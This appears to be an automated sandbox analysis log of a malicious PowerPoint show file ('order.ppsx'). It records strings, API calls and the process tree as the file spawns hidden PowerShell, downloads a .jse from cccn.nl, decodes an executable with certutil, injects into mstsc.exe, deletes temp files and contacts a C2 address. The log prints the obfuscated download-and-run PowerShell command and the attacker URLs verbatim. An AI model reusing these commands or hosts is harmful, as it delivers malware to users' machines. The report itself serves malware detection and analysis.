Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_004022E6 GetProfilesDirectoryW,GetProfilesDirectoryW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProfilesDirectoryW,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,GetProcessHeap,FindFirstFileW,GetProcessHeap,HeapAlloc,GetCommandLineA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,lstrcmpW,GetProcessHeap,lstrcmpW,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,wsprintfW,GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, | 10_2_004022E6 |
Source: powershell.exe | String found in binary or memory: file:// |
Source: POWERPNT.EXE, powershell.exe | String found in binary or memory: file:/// |
Source: POWERPNT.EXE | String found in binary or memory: file:///( |
Source: POWERPNT.EXE, powershell.exe | String found in binary or memory: file:///c: |
Source: powershell.exe | String found in binary or memory: file:///c:/w |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/system32/windowsp |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/ |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/$ |
Source: POWERPNT.EXE | String found in binary or memory: file:///x |
Source: powershell.exe | String found in binary or memory: http:// |
Source: powershell.exe | String found in binary or memory: http://ccc |
Source: powershell.exe | String found in binary or memory: http://cccn.nl |
Source: powershell.exe | String found in binary or memory: http://cccn.nl/2.2 |
Source: powershell.exe | String found in binary or memory: http://cccn.nl/2.2h |
Source: powershell.exe | String found in binary or memory: http://cccn.nl/c.php |
Source: wscript.exe | String found in binary or memory: http://crl.comodo.net/utn-userfirst-hardware.crl0q |
Source: wscript.exe | String found in binary or memory: http://crl.comodoca.com/utn-userfirst-hardware.crl06 |
Source: wscript.exe | String found in binary or memory: http://crl.entrust.net/2048ca.crl0 |
Source: wscript.exe | String found in binary or memory: http://crl.entrust.net/server1.crl0 |
Source: wscript.exe | String found in binary or memory: http://crl.pkioverheid.nl/domorganisatielatestcrl-g2.crl0 |
Source: wscript.exe | String found in binary or memory: http://crl.pkioverheid.nl/domovlatestcrl.crl0 |
Source: wscript.exe | String found in binary or memory: http://crl.usertrust.com/utn-userfirst-object.crl0) |
Source: wscript.exe | String found in binary or memory: http://crt.comodoca.com/utnaddtrustserverca.crt0$ |
Source: wscript.exe | String found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0 |
Source: powershell.exe | String found in binary or memory: http://h |
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com0 |
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com0% |
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com0- |
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com0/ |
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com05 |
Source: wscript.exe | String found in binary or memory: http://ocsp.entrust.net03 |
Source: wscript.exe | String found in binary or memory: http://ocsp.entrust.net0d |
Source: powershell.exe | String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationfilter |
Source: powershell.exe | String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/wsman/selectorfilter |
Source: powershell.exe | String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#identifyresponseh |
Source: wscript.exe | String found in binary or memory: http://www.digicert.com.my/cps.htm02 |
Source: wscript.exe | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0 |
Source: wscript.exe | String found in binary or memory: http://www.public-trust.com/cgi-bin/crl/2018/cdp.crl0 |
Source: wscript.exe | String found in binary or memory: http://www.public-trust.com/cps/omniroot.html0 |
Source: wscript.exe | String found in binary or memory: http://www.usertrust.com1 |
Source: wscript.exe | String found in binary or memory: https://185.159.82.38:45000/c/pollos.php?add=e9e45de07d328e8d46adf4357840be5e&506&uid=883565492&out= |
Source: wscript.exe | String found in binary or memory: https://secure.comodo.com/cps0 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_0040EFB9 EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetProcessHeap,GetProcessHeap,HeapAlloc,GetFocus,LoadLibraryA,GetProcAddress,GetCommandLineW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetModuleFileNameW,GetProcessHeap,RtlAllocateHeap,IsSystemResumeAutomatic,GetProcessHeap,GetModuleHandleW,ExitProcess,GetCurrentProcess,GetVersion,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetActiveWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,StrStrIW,StrStrIW,StrStrIW,CreateThread,CloseHandle,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,Sleep, | 10_2_0040EFB9 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_004022E6 GetProfilesDirectoryW,GetProfilesDirectoryW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProfilesDirectoryW,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,GetProcessHeap,FindFirstFileW,GetProcessHeap,HeapAlloc,GetCommandLineA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,lstrcmpW,GetProcessHeap,lstrcmpW,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,wsprintfW,GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, | 10_2_004022E6 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_0040DDBF lstrlenW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapFree,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,lstrcpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,lstrcatW,lstrcpyW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,lstrcatW,FindFirstFileW,GetProcessHeap,lstrlenW,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, | 10_2_0040DDBF |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_00401E16 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProfilesDirectoryW,GetProcessHeap,wsprintfW,FindFirstFileW,StrCmpW,StrCmpW,StrCpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,StrCatW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetDoubleClickTime,wsprintfW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapAlloc,GetDialogBaseUnits,ExpandEnvironmentStringsW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, | 10_2_00401E16 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_0040BB40 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,ReleaseCapture,GetProcessHeap,GetSystemDirectoryW,lstrcatW,FindFirstFileW,StrRChrW,FindNextFileW,FindFirstFileW,FindClose,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, | 10_2_0040BB40 |
Source: C:\Windows\System32\mstsc.exe | Code function: 13_2_00061E16 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProfilesDirectoryW,GetProcessHeap,wsprintfW,FindFirstFileW,StrCmpW,StrCmpW,StrCpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,StrCatW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetDoubleClickTime,wsprintfW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapAlloc,GetDialogBaseUnits,ExpandEnvironmentStringsW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, | 13_2_00061E16 |
Source: C:\Windows\System32\mstsc.exe | Code function: 13_2_000622E6 GetProfilesDirectoryW,GetProfilesDirectoryW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProfilesDirectoryW,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,GetProcessHeap,FindFirstFileW,GetProcessHeap,HeapAlloc,GetCommandLineA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,lstrcmpW,GetProcessHeap,lstrcmpW,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,wsprintfW,GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, | 13_2_000622E6 |
Source: C:\Windows\System32\mstsc.exe | Code function: 13_2_0006BB40 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,ReleaseCapture,GetProcessHeap,GetSystemDirectoryW,lstrcatW,FindFirstFileW,StrRChrW,FindNextFileW,FindFirstFileW,FindClose,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, | 13_2_0006BB40 |
Source: C:\Windows\System32\mstsc.exe | Code function: 13_2_0006DDBF lstrlenW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapFree,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,lstrcpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,lstrcatW,lstrcpyW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,lstrcatW,FindFirstFileW,GetProcessHeap,lstrlenW,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, | 13_2_0006DDBF |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_0040468D LookupPrivilegeValueA,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle, | 10_2_0040468D |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_00401D22 GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,GetProcessHeap,ExitWindowsEx,GetProcessHeap,HeapFree, | 10_2_00401D22 |
Source: C:\Windows\System32\mstsc.exe | Code function: 13_2_00061D22 GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,GetProcessHeap,ExitWindowsEx,GetProcessHeap,HeapFree, | 13_2_00061D22 |
Source: C:\Windows\System32\mstsc.exe | Code function: 13_2_0006468D LookupPrivilegeValueA,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle, | 13_2_0006468D |
Source: C:\Windows\System32\certutil.exe | Console Write: ...............v....I.n.p.u.t. .L.e.n.g.t.h. .=. .3.1.6.7.6.2........n30........R.a...............Aw,...*........."..... |
Source: C:\Windows\System32\certutil.exe | Console Write: ...............v........#......v..0.........................#.......................R.a...........Aw(................... |
Source: C:\Windows\System32\certutil.exe | Console Write: ...............v....O.u.t.p.u.t. .L.e.n.g.t.h. .=. .2.3.7.5.6.8.................R.a...........Aw..Aw,...,........."..... |
Source: C:\Windows\System32\certutil.exe | Console Write: ...............v........#......v..0.........................#.......................R.a...........Aw(................... |
Source: C:\Windows\System32\certutil.exe | Console Write: ...............v........#......v..0.........................#........................C.......)].1.Aw....b........."..... |
Source: C:\Windows\System32\certutil.exe | Console Write: ...............v........#......v..0.........................#............................C......5.AwP................... |
Source: C:\Windows\System32\cmd.exe | Console Write: ......................0.....(...0.......K.......................................!...@@ ...0.E.....0.....\....F"J....p.0. |
Source: C:\Windows\System32\cmd.exe | Console Write: ....................A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........X.0.0.E.....V. J............X.0........v,.0.&...`.....,..... |
Source: C:\Windows\System32\cmd.exe | Console Write: ......................0.....(...0.......[...........................F.......C....XAw@@ .(.0.}...@.0.....z....F"J......0. |
Source: C:\Windows\System32\cmd.exe | Console Write: ........ ............ ....0...0.E. J........ .......@F#J. ....0.0.E. ...V. J..............0........v........`.....,..... |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="0"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="4"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="236"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="316"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="352"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="360"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="388"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="444"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="456"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="464"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="556"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="620"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="672"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="792"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="832"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="856"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="960"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="1088"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="1200"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="1248"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="1356"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="1432"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="1504"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="1524"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="1840"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="848"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="1808"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="1704"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="1900"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="520"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="1124"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="952"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="2256"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="2324"::GetOwner |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="2496"::GetOwner |
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\powerpnt.exe' /s 'C:\order.ppsx' |
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\'' |
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\LUKETA~1\AppData\Local\Temp\ii.jse' |
Source: unknown | Process created: C:\Windows\System32\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\LUKETA~1\AppData\Local\Temp\168.gop C:\Users\LUKETA~1\AppData\Local\Temp\484.exe |
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c start C:\Users\LUKETA~1\AppData\Local\Temp\484.exe |
Source: unknown | Process created: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe C:\Users\LUKETA~1\AppData\Local\Temp\484.exe |
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /U /Q /C del /Q/F %TEMP%\*.exe && del /Q/F %TEMP%\*.gop && del /Q/F %TEMP%\*.txt && del /Q/F %TEMP%\*.log && del /Q/F %TEMP%\*.jse |
Source: unknown | Process created: C:\Windows\System32\mstsc.exe C:\Windows\System32\mstsc.exe 'C:\Users\LUKETA~1\AppData\Local\Temp\484.exe' |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\'' |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\LUKETA~1\AppData\Local\Temp\ii.jse' |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\LUKETA~1\AppData\Local\Temp\168.gop C:\Users\LUKETA~1\AppData\Local\Temp\484.exe |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c start C:\Users\LUKETA~1\AppData\Local\Temp\484.exe |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /U /Q /C del /Q/F %TEMP%\*.exe && del /Q/F %TEMP%\*.gop && del /Q/F %TEMP%\*.txt && del /Q/F %TEMP%\*.log && del /Q/F %TEMP%\*.jse |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe C:\Users\LUKETA~1\AppData\Local\Temp\484.exe |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Process created: C:\Windows\System32\mstsc.exe C:\Windows\System32\mstsc.exe 'C:\Users\LUKETA~1\AppData\Local\Temp\484.exe' |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_0040F995 GetProcessHeap,CreateProcessW,GetProcessHeap,HeapAlloc,GetShellWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetModuleHandleA,GetProcAddress,NtCreateSection,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree, | 10_2_0040F995 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_0040F6F4 GetProcessHeap,GetProcessHeap,HeapAlloc,GetClipboardSequenceNumber,GetProcessHeap,HeapAlloc,GetShellWindow,GetModuleHandleA,GetProcAddress,NtMapViewOfSection,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree, | 10_2_0040F6F4 |
Source: C:\Windows\System32\mstsc.exe | Code function: 13_2_0006E0EF NtQuerySystemInformation,GetProcessHeap,GetProcessHeap,HeapAlloc,GetShellWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,ReleaseCapture,LoadLibraryA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,NtQuerySystemInformation,NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,VirtualFree, | 13_2_0006E0EF |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_0040EFB9 EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetProcessHeap,GetProcessHeap,HeapAlloc,GetFocus,LoadLibraryA,GetProcAddress,GetCommandLineW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetModuleFileNameW,GetProcessHeap,RtlAllocateHeap,IsSystemResumeAutomatic,GetProcessHeap,GetModuleHandleW,ExitProcess,GetCurrentProcess,GetVersion,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetActiveWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,StrStrIW,StrStrIW,StrStrIW,CreateThread,CloseHandle,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,Sleep, | 10_2_0040EFB9 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_004022E6 GetProfilesDirectoryW,GetProfilesDirectoryW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProfilesDirectoryW,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,GetProcessHeap,FindFirstFileW,GetProcessHeap,HeapAlloc,GetCommandLineA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,lstrcmpW,GetProcessHeap,lstrcmpW,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,wsprintfW,GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, | 10_2_004022E6 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_0040DDBF lstrlenW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapFree,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,lstrcpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,lstrcatW,lstrcpyW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,lstrcatW,FindFirstFileW,GetProcessHeap,lstrlenW,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, | 10_2_0040DDBF |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_00401E16 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProfilesDirectoryW,GetProcessHeap,wsprintfW,FindFirstFileW,StrCmpW,StrCmpW,StrCpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,StrCatW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetDoubleClickTime,wsprintfW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapAlloc,GetDialogBaseUnits,ExpandEnvironmentStringsW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, | 10_2_00401E16 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_0040BB40 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,ReleaseCapture,GetProcessHeap,GetSystemDirectoryW,lstrcatW,FindFirstFileW,StrRChrW,FindNextFileW,FindFirstFileW,FindClose,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, | 10_2_0040BB40 |
